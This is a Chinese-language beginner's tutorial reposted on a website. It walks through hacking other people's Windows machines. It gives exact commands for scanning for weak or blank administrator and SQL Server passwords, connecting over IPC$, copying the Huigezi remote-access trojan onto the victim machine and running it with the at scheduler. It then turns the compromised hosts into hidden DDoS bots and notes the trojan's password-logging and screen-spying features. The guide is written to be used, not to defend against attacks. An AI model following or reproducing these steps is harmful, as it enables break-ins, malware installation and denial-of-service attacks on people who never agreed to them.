新手之扫描、入侵、攻击全攻略

　　一、扫描

下载解压后，运行x-scan-gui，在“扫描模块”里只选“nt-server弱口令“和“sql-server弱口令”这两项；在“扫描参数”里“基本设置”选项设置你要扫描的ip地址；在“端口相关设置”里“待检测端口”输入你要扫描的端口，在这里可以只扫描1433和3389这两个端口，其它的不变。一切准备好后就开始扫描，要不了多久就会出现结果。

二、入侵

在这里我们要用到一个木马，我推荐大家用“灰鸽子”，它是一个反弹性木马，具有自动上线连接的功能，当中木马机器的ip地址变了时也会自动上线连接。

下载解压后有p-client.exe（在自己的机器上运行的客户端程序）和server.exe（在肉鸡上运行的程序）。我们要让对方运行server.exe程序（记住这个程序不要在自己的机器上运行哟）。在让对方运行server.exe程序之前先配置server.exe程序（注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序，我们也不能和他连接）。具体配置server的方http://www.ttian.net/article/show.php?id=357

比如我们刚才扫描到一台ip为61.216.216.216的主机，administrator密码为空。我们要利用刚才扫描得到的nt弱口令，再用ipc$管道来连接。具体如下：

1、先和对方主机建立连接，操作如下：

net use \\61.216.216.216\ipc$ "" /user:"administrator"
2、拷贝木马程序到对方的机器的c盘下，操作如下：

copy server.exe \\61.216.216.216\c$
3、查看对方时间，操作如下：

net time \\61.216.216.216
4、假设对方的时间为下午1:23，让对方机器在13：25运行木马程序，操作如下：

at \\61.216.216.216 13:25 c:\server.exe（注意对方的时间为12小时制，我们用at命令时要转换为24小时制，让对方运行木马的时间最好比对方机器的当前时间多几分钟）

5、查看木马程序是否运行，操作如下：

at \\61.216.216.216
如果清单为空，说明木马已运行了，这时我们可以在自己的机器上运行p-client.exe，刚才中了木马的机器就会自动来连接。

三、攻击

我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”，它是一个采用的是分布式拒绝服务攻击的软件，下载下地http://www.leothreads.com/usr/25/25_18196.zip
“独裁者”的使用教程：

我们要让肉鸡运行“独裁者”的server.exe程序。

在木马“灰鸽子”里进入ip为61.216.216.216的主机的c盘，点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”，过一会我们就可以在
“独裁者”里加61.216.216.216这个ｉｐ了。

也许有人要问：“就是为什么我们要让对方对行木马，我们不可以直接在ｄｏｓ下上传“独裁者”的server.exe文件并上它运行就行了吗？

在这里我要说的就是“独裁者”没有自动连接的功能，如果肉鸡不是固定的ｉｐ，哪肉鸡就只能用一次，因为肉鸡原来哪个ｉｐ变了呀！这里的木马就有自动上线连接ｉｐ的功能，即使肉鸡的ｉｐ变了也能和连接。这样肉鸡就飞不了啦！嘿嘿！

其实这个的木马还有很多功能，比如可以用来作代理、查看对方屏幕、记录密码等，这就要你自己去慢慢探索吧。

以上全部在ｗｉｎ２０００里通过。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有